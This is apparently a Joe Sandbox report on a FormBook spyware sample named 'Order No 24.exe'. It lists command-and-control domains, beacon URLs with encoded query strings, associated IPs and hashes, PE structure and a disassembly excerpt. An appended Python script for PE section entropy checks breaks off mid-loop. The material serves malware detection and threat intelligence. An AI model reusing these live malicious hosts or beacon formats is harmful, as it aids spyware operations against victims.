                                                                                                              http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://i4.cdn-image.com/__media__/js/min.js?v2.3net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                high
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1557782
Start date and time: 2024-11-18 16:24:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Order No 24.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@16/9
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 53
• Number of non-executed functions: 291
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Order No 24.exe
Time | Type | Description
10:25:51 | API Interceptor | 10169110x Sleep call for process: net.exe modified
                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                47.52.221.8RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.wukong.college/9ezc/
                                                                                                                                statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.wukong.college/9ezc/
                                                                                                                                Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.wukong.college/4wc1/?mRu=2onXjOgtXs7bFrsmBuZreqMXUphshRxX5MKbqzS42irGFJYns6q4JN3vt1eB5PqznJS/LdYYFyeg3ON9AeFtKxD4o+R2FH9zSHG9zjVrST6RS49i0a4KyRw=&UJ=7H1XM
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.wukong.college/9ezc/
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.wukong.college/9ezc/
                                                                                                                                XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.wukong.college/9ezc/
                                                                                                                                128.65.195.180RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.evoo.website/293d/
                                                                                                                                statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.evoo.website/293d/
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.evoo.website/293d/
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.evoo.website/293d/
                                                                                                                                XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.evoo.website/293d/
                                                                                                                                TT Application copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.airbnbneuchatel.com/0zfk/
                                                                                                                                Inquiry Second Reminder.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.spx21.com/dz25/?9rz0r6F8=IXjUS8uTLEXXc4IFKSk4QK94/u/v4rSLXrhItQqacAC9jZYA+NiFbTAYaFgWrpFehgvY&RP=7nHTxl6
                                                                                                                                LPOH2401-3172(Mr.Kem Sophea)-pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.zimmerli.online/btrd/?E2MXNj=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT&bt-=XVJdUxa8
                                                                                                                                PGiUp8uqGt.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.zimmerli.online/btrd/?2dz=odelT&-Z1dnr=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT
                                                                                                                                LGSTXJeTc4.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.zimmerli.online/btrd/?bXUH_86P=TxZDFykb+0Hph0GWgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPqsFIgKb+U&lzud6=y6gL_DWH
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.yushaliu.online | RFQ.exe | malicious | FormBook | 208.91.197.27
 | statement of accounts.exe | malicious | FormBook | 208.91.197.27
 | XhAQ0Rk63O.exe | malicious | FormBook | 208.91.197.27
webredir.vip.gandi.net | RFQ.exe | malicious | FormBook | 217.70.184.50
 | statement of accounts.exe | malicious | FormBook | 217.70.184.50
 | RFQ.exe | malicious | FormBook | 217.70.184.50
 | RFQ.exe | malicious | FormBook | 217.70.184.50
 | XhAQ0Rk63O.exe | malicious | FormBook | 217.70.184.50
 | SWIFT.exe | malicious | FormBook | 217.70.184.50
 | #10302024.exe | malicious | FormBook | 217.70.184.50
 | rPO-000172483.exe | malicious | FormBook | 217.70.184.50
 | PO-000041522.exe | malicious | FormBook | 217.70.184.50
 | Doc 784-01965670.exe | malicious | FormBook | 217.70.184.50
www.evoo.website | RFQ.exe | malicious | FormBook | 128.65.195.180
 | statement of accounts.exe | malicious | FormBook | 128.65.195.180
 | RFQ.exe | malicious | FormBook | 128.65.195.180
 | RFQ.exe | malicious | FormBook | 128.65.195.180
 | XhAQ0Rk63O.exe | malicious | FormBook | 128.65.195.180
www.wukong.college | RFQ.exe | malicious | FormBook | 47.52.221.8
 | statement of accounts.exe | malicious | FormBook | 47.52.221.8
 | Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | FormBook | 47.52.221.8
 | RFQ.exe | malicious | FormBook | 47.52.221.8
 | RFQ.exe | malicious | FormBook | 47.52.221.8
 | XhAQ0Rk63O.exe | malicious | FormBook | 47.52.221.8
Match | Associated Sample Name / URL | Detection | Threat Name | Context
INFOMANIAK-ASCH | RFQ.exe | malicious | FormBook | 128.65.195.180
 | statement of accounts.exe | malicious | FormBook | 128.65.195.180
 | RFQ.exe | malicious | FormBook | 128.65.195.180
 | RFQ.exe | malicious | FormBook | 128.65.195.180
 | XhAQ0Rk63O.exe | malicious | FormBook | 128.65.195.180
 | https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yL | malicious | Ratty | 128.65.195.91
 | https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yL | malicious | Ratty | 128.65.195.91
 | z95ordemdecomprapdfx4672xx.exe | malicious | FormBook | 84.16.66.164
 | Doc.exe | malicious | Sliver | 128.65.199.135
 | Nowe zam#U00f3wienie zakupu pdf.exe | malicious | FormBook | 84.16.66.164
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | botx.m68k.elf | malicious | Mirai | 47.241.69.12
 | botx.ppc.elf | malicious | Mirai | 47.252.147.83
 | http://kklk16.bsyo45ksda.top | malicious | Unknown | 47.254.188.7
 | RFQ.exe | malicious | FormBook | 47.242.89.146
 | yakuza.i586.elf | malicious | Mirai | 47.244.187.149
 | botnet.x86.elf | malicious | Mirai, Moobot | 8.212.195.111
 | http://software.oldversion.com/download.php?f=YTo1OntzOjQ6InRpbWUiO2k6MTczMTQ4OTAwMjtzOjI6ImlkIjtpOjEzODk4O3M6NDoiZmlsZSI7czo0MzoicGRmY3JlYXRvci0xLTYtMi1QREZDcmVhdG9yLTFfNl8yX3NldHVwLmV4ZSI7czozOiJ1cmwiO3M6NTA6Imh0dHA6Ly93d3cub2xkdmVyc2lvbi5jb20vd2luZG93cy9wZGZjcmVhdG9yLTEtNi0yIjtzOjQ6InBhc3MiO3M6MzI6IjMwYzExNzY3MTEwNWY3MjhjYjA0YzU2ZjkzYTc1YTRjIjt9 | malicious | Unknown | 47.253.61.56
 | statement of accounts.exe | malicious | FormBook | 47.242.89.146
 | Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | FormBook | 47.52.221.8
 | inter.exe | malicious | Unknown | 8.210.59.12
LEASEWEB-UK-LON-11GB | RFQ.exe | malicious | FormBook | 23.106.59.18
 | statement of accounts.exe | malicious | FormBook | 23.106.59.18
 | RFQ.exe | malicious | FormBook | 23.106.59.18
 | XhAQ0Rk63O.exe | malicious | FormBook | 23.106.59.18
 | SecuriteInfo.com.FileRepMalware.27261.32754.exe | malicious | Unknown | 23.106.59.52
 | SecuriteInfo.com.ELF.Agent-AIN.28488.28782.elf | malicious | Mirai | 95.168.183.162
 | SecuriteInfo.com.FileRepMalware.15071.2577.exe | malicious | Unknown | 23.106.59.18
 | 5672D5B80770DEB68BF2435FEF12D521C04CE012250CC.exe | malicious | Unknown | 23.106.59.52
 | F85362FA96806CE4FF93B8A49E0E74F65DEA0B759AE87.exe | malicious | Unknown | 23.106.59.52
 | d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exe | malicious | Unknown | 23.106.59.52
No context
No context

Process: C:\Windows\SysWOW64\net.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1239949490932863
Encrypted: false
SSDEEP: 384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5: 271D5F995996735B01672CF227C81C17
SHA1: 7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256: 9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512: 62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious: false
Reputation: high, very likely benign file
                                                                                                                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\Order No 24.exe
File Type: data
Category: dropped
Size (bytes): 288768
Entropy (8bit): 7.995598763116583
Encrypted: true
SSDEEP: 6144:N327EjWOBByaRA0h/T5L/YpEQGEyyzGtKS2pUii0n:duFkyaRVh/lLQmEw2pUir
MD5: 9238A114828F295792588581D25A901B
SHA1: 3C2515C2BF9F25E074EB5F29F1C0EAB70E8B1769
SHA-256: ED753EC8DA9453487910EF64CB9BC60E96CD814809B15491F3BFEEDCD45EBF97
SHA-512: 9D5A406B013003420C6D5ECB204DDCF3F0380F9A96D101E00E38893713908BB3E87350F365919157F48B945832C87471A3F4CF2B6040D9ADE0730B2EDDE6A1D3
Malicious: false
Reputation: low
                                                                                                                                Preview:.....F2HW..[...x.D;..}[N...OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4.XGS=Y.FW.^.s.X..eg,Q9z''7!34Yo;&=])Fh5)w&'Vy9$dw.kj781=hLX>kXGS3F2H.M^.oX>.w$T..*=.O..oT(.]....(0.M...e0-.a-["g72.FAU4OXGSc.2H.MVT[.T.JD3D8JZW.XD@^5DXG.7F2HWLWTR8.DJD3T8JZ'QXFA.4OHGS3D2HQLWTR8YPLD3D8JZWU(BAU6OXGS3F0H..WTB8Y@JD3D(JZGUXFAU4_XGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWT|L<(>D3D..^WUHFAUbKXGC3F2HWLWTR8YPJD.D8*ZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWL

Process: C:\Users\user\Desktop\Order No 24.exe
File Type: data
Category: dropped
Size (bytes): 288768
Entropy (8bit): 7.995598763116583
Encrypted: true
SSDEEP: 6144:N327EjWOBByaRA0h/T5L/YpEQGEyyzGtKS2pUii0n:duFkyaRVh/lLQmEw2pUir
MD5: 9238A114828F295792588581D25A901B
SHA1: 3C2515C2BF9F25E074EB5F29F1C0EAB70E8B1769
SHA-256: ED753EC8DA9453487910EF64CB9BC60E96CD814809B15491F3BFEEDCD45EBF97
SHA-512: 9D5A406B013003420C6D5ECB204DDCF3F0380F9A96D101E00E38893713908BB3E87350F365919157F48B945832C87471A3F4CF2B6040D9ADE0730B2EDDE6A1D3
Malicious: false
Reputation: low
                                                                                                                                Preview:.....F2HW..[...x.D;..}[N...OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4.XGS=Y.FW.^.s.X..eg,Q9z''7!34Yo;&=])Fh5)w&'Vy9$dw.kj781=hLX>kXGS3F2H.M^.oX>.w$T..*=.O..oT(.]....(0.M...e0-.a-["g72.FAU4OXGSc.2H.MVT[.T.JD3D8JZW.XD@^5DXG.7F2HWLWTR8.DJD3T8JZ'QXFA.4OHGS3D2HQLWTR8YPLD3D8JZWU(BAU6OXGS3F0H..WTB8Y@JD3D(JZGUXFAU4_XGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWT|L<(>D3D..^WUHFAUbKXGC3F2HWLWTR8YPJD.D8*ZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWL

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.151220800130483
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Order No 24.exe
File size: 1'218'048 bytes
MD5: e785b831c8183b40f176d34c36e8ad3e
SHA1: 8927f85512b851604e1bb6a44e1e2124b8592381
SHA256: dab3c27ad67888d0202abfd11c7fc17d62d501dd611d6f46756bfefe246b06e5
SHA512: 96c0146d7c8b77dbffaa0416c023978bdd13b257c82a6f21e501c9d58162923d4858d45dfd816b2d000b70899e3904b6bfd39757f1d9f8d0fb2592a9eca41b0c
SSDEEP: 24576:Ytb20pkaCqT5TBWgNQ7a9PxwVvfaM5jr75mew6A:hVg5tQ7a9PeVvTjX85
TLSH: 7145CF1363DD8361C7B25273BA65B701AEBF782506B1F96B2FD8093DE920122521E773
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                                                                                Icon Hash:aaf3e3e3938382a0
                                                                                                                                Entrypoint:0x425f74
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x673B2208 [Mon Nov 18 11:16:24 2024 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:5
                                                                                                                                OS Version Minor:1
                                                                                                                                File Version Major:5
                                                                                                                                File Version Minor:1
                                                                                                                                Subsystem Version Major:5
                                                                                                                                Subsystem Version Minor:1
                                                                                                                                Import Hash:3d95adbf13bbe79dc24dccb401c12091
Instruction
call 00007FB89D1AB7DFh
jmp 00007FB89D19E7F4h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FB89D19E97Ah
cmp edi, eax
jc 00007FB89D19ECDEh
bt dword ptr [004C0158h], 01h
jnc 00007FB89D19E979h
rep movsb
jmp 00007FB89D19EC8Ch
cmp ecx, 00000080h
jc 00007FB89D19EB44h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FB89D19E980h
bt dword ptr [004BA370h], 01h
jc 00007FB89D19EE50h
bt dword ptr [004C0158h], 00000000h
jnc 00007FB89D19EB1Dh
test edi, 00000003h
jne 00007FB89D19EB2Eh
test esi, 00000003h
jne 00007FB89D19EB0Dh
bt edi, 02h
jnc 00007FB89D19E97Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FB89D19E983h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FB89D19E9D5h
bt esi, 03h
jnc 00007FB89D19EA28h
movdqa xmm1, dqword ptr [esi+00h]
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2012 UPD4 build 61030
• [RES] VS2012 UPD4 build 61030
• [LNK] VS2012 UPD4 build 61030
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb7004          0x17c         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc4000          0x6054c       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x125000         0x6c4c        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x8d8d0          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xb2730          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8d000          0x860         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text   0x1000           0x8b54f       0x8b600   f437a6545e938612764dbb0a314376fc  False     0.5699499019058296   data       6.680413749210956   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8d000          0x2cc42       0x2ce00   827ffd24759e8e420890ecf164be989e  False     0.330464397632312    data       5.770192333189168   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xba000          0x9d54        0x6200    e0a519f8e3a35fae0d9c2cfd5a4bacfc  False     0.16402264030612246  data       2.002691099965349   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0xc4000          0x6054c       0x60600   01c95274e1e27df77cf2eb991c0fd927  False     0.9320104774643321   data       7.9032014799354275  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x125000         0xa474        0xa600    0bc98f8631ef0bde830a7f83bb06ff08  False     0.5017884036144579   data       5.245426654116355   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
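The Entropy column above is what separates this binary's sections at a glance: .text and .rdata sit where compiled code and read-only data normally sit, while .rsrc is at 7.90 bits per byte, the level of compressed or encrypted data, which is where a packed payload carried in resources shows up. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it walks the DOS header, PE signature, COFF header and section headers by hand (no pefile dependency), computes the Shannon entropy of each section's raw bytes on the same 0..8 scale the report uses, and lists sections above a threshold. The 7.0 threshold is an assumption, and the PE it parses when run without arguments is a constructed two-section file built inline so the example runs offline.

```python
"""Added example: parse a PE section table and compute per-section entropy.
Not part of the sandbox report or the sample; the test PE below is constructed."""
import math
import struct
import sys

ENTROPY_THRESHOLD = 7.0  # assumption: compressed/encrypted data sits near 8 bits/byte


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0..8.0), the scale used in the report."""
    n = len(data)
    if n == 0:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return max(0.0, -sum(c / n * math.log2(c / n) for c in counts if c))


def parse_sections(pe: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section headers.
    Returns one dict per section with the columns the report's section table uses."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", pe, coff + 2)
    opt_size, = struct.unpack_from("<H", pe, coff + 16)
    table = coff + 20 + opt_size          # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        off = table + i * 40              # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", pe, off)
        chars, = struct.unpack_from("<I", pe, off + 36)
        raw = pe[rptr:rptr + rsize]       # entropy is taken over the raw on-disk bytes
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va,
            "virtual_size": vsize,
            "raw_size": rsize,
            "entropy": shannon_entropy(raw),
            "executable": bool(chars & 0x20000000),  # IMAGE_SCN_MEM_EXECUTE
            "writable": bool(chars & 0x80000000),    # IMAGE_SCN_MEM_WRITE
        })
    return sections


def suspicious_sections(sections, threshold=ENTROPY_THRESHOLD) -> list:
    """Names of sections whose raw bytes look compressed or encrypted."""
    return [s["name"] for s in sections if s["entropy"] >= threshold]


def build_test_pe() -> bytes:
    """Constructed minimal PE32 (not a real sample): a zero-filled .text and a
    .rsrc filled from a fixed-seed LCG, so the entropies are deterministic."""
    e_lfanew, opt_size, file_align = 0x40, 0xE0, 0x200
    text = bytes(0x400)
    x, rnd = 12345, bytearray()
    for _ in range(0x1000):
        x = (1103515245 * x + 12345) & 0xFFFFFFFF
        rnd.append((x >> 16) & 0xFF)
    blobs = ((b".text", text, 0x60000020), (b".rsrc", bytes(rnd), 0x40000040))
    hdr_len = e_lfanew + 4 + 20 + opt_size + 40 * len(blobs)
    hdr_size = -(-hdr_len // file_align) * file_align   # round headers up to FileAlignment
    img = bytearray(b"MZ" + bytes(0x3A) + struct.pack("<I", e_lfanew))
    img += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(blobs), 0, 0, 0, opt_size, 0x0102)
    img += struct.pack("<H", 0x10B) + bytes(opt_size - 2)   # PE32 magic, rest zeroed
    rptr, va, payload = hdr_size, 0x1000, b""
    for name, data, chars in blobs:
        img += struct.pack("<8sIIIIIIHHI", name, len(data), va, len(data), rptr, 0, 0, 0, 0, chars)
        payload += data
        rptr += len(data)
        va += 0x1000
    img += bytes(hdr_size - len(img)) + payload
    return bytes(img)


if __name__ == "__main__":
    pe = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_pe()
    secs = parse_sections(pe)
    print(f"{'Name':8} {'VA':>8} {'VSize':>8} {'RawSize':>8} {'Entropy':>8}  X W")
    for s in secs:
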